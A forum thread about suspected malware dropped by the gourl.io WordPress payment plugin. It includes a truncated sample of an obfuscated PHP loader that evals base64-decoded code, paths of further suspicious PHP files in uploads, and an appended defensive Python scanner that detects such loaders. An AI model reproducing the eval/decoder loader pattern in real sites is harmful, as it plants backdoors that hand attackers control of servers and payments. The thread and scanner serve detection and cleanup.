Suspicious script running on WordPress after installing gourl.io

I recently installed this bitcoin / crypto payment gateway from WooCommerce that seems to have some good reviews. There is a file that I am not sure about, and I seem to have some scripts running. Here is a sample of the code.

My username on my VPS is robotinsight.

The obfuscated PHP file looks like this:

<?php /* Obfuscation provided by FOPO - Free Online PHP Obfuscator: http://www.fopo.com.ar/ This code was created on Friday, October 27th, 2017 at 8:53 UTC from IP 5.228.13.253 Checksum: f8ae2f3fcc05f04aece9ca0e0e21c64f25c4f0d6 */ $c1201518="\142\x61\163\145\66\64\137\144\x65\143\157\144\x65";@eval($c1201518( "Ly9OS3RIdStmU3gwbmx1L1ZXb2xVbDN5c0JQSHd4MnJKWW9rS3V4WFJVZk5SQXFuRFVpYitGU243Z1

Comments

  • Thank you for the info. Can you tell me what is the exact file?

  • 61d2ec.php

    In public_html

  • Thank you! please allow me a few minutes to check all of this.

  • edited April 2018

    Still checking, but so far, three other suspicious scripts have also been found:

    /public_html/wp-content/uploads/gourl/files/gourl_ipn.php
    /public_html/wp-content/uploads/gourl/images/qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1-2.php
    /public_html/wp-content/uploads/gourl/images/qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1.php
    

    I would ask you to check, and let me know if I may remove them. Also, I have noticed that the account is using an outdated version of WP; it should be updated to the latest one ASAP, as this too poses a security risk.

  • Thank you for your patience. No further potentially malicious scripts have been found. I would advise you to update everything, and also if you have any original code in the account, have your developer review it. Also, scanning all local devices for malware, and possibly changing all passwords would be wise.

  • Even after I removed this, I found that the gourl folder in the uploads folder remained.

  • People are also reporting they steal payments: https://wordpress.org/support/topic/stole-my-payment/
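A defensive check for what this thread turned up, as an added example that is not part of the original posts: it reports every .php file under an uploads directory and decodes PHP octal/hex string escapes to spot a decoder name hidden from plain text search, as in the 61d2ec.php sample. The function names, the decoder list and the constructed sample (payload replaced by a placeholder) are assumptions made for this example.

```python
import re
from pathlib import Path

# PHP double-quoted string escapes: \xHH (hex) and \NNN (octal).
_ESC = re.compile(r'\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3}))')
_STR = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Heuristic: PHP constructs that execute a string as code.
_SINKS = re.compile(r'\b(?:eval|assert|create_function)\s*\(', re.I)
# Assumed list of decoder functions commonly wrapped around a payload.
_DECODERS = {"base64_decode", "gzinflate", "gzuncompress", "str_rot13"}

def decode_php_escapes(s):
    """Resolve \\xHH and \\NNN escapes the way PHP does inside double quotes."""
    def sub(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)
    return _ESC.sub(sub, s)

def inspect_php(source):
    """Return heuristic findings for one PHP source string."""
    findings = []
    if _SINKS.search(source):
        findings.append("dynamic-eval")
    for m in _STR.finditer(source):
        raw = m.group(1)
        if not _ESC.search(raw):
            continue  # plain literal, nothing hidden by escapes
        name = decode_php_escapes(raw).lower()
        if name in _DECODERS:
            findings.append("escaped-decoder:" + name)
    return findings

def scan_uploads(root):
    """Map each .php file under root to its findings.

    wp-content/uploads normally holds media only, so any PHP there is reported.
    """
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(errors="replace")
        report[path.relative_to(root).as_posix()] = ["php-in-uploads"] + inspect_php(text)
    return report

# Constructed sample modelled on the snippet in the question; payload is a placeholder.
SAMPLE = (r'<?php $c1201518="\142\x61\163\145\66\64\137\144\x65\143\157\144\x65";'
          r'@eval($c1201518("PAYLOAD_PLACEHOLDER"));')
```

Run `scan_uploads` against a copy of `wp-content/uploads`; a hit is a reason to review the file, not proof of compromise.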
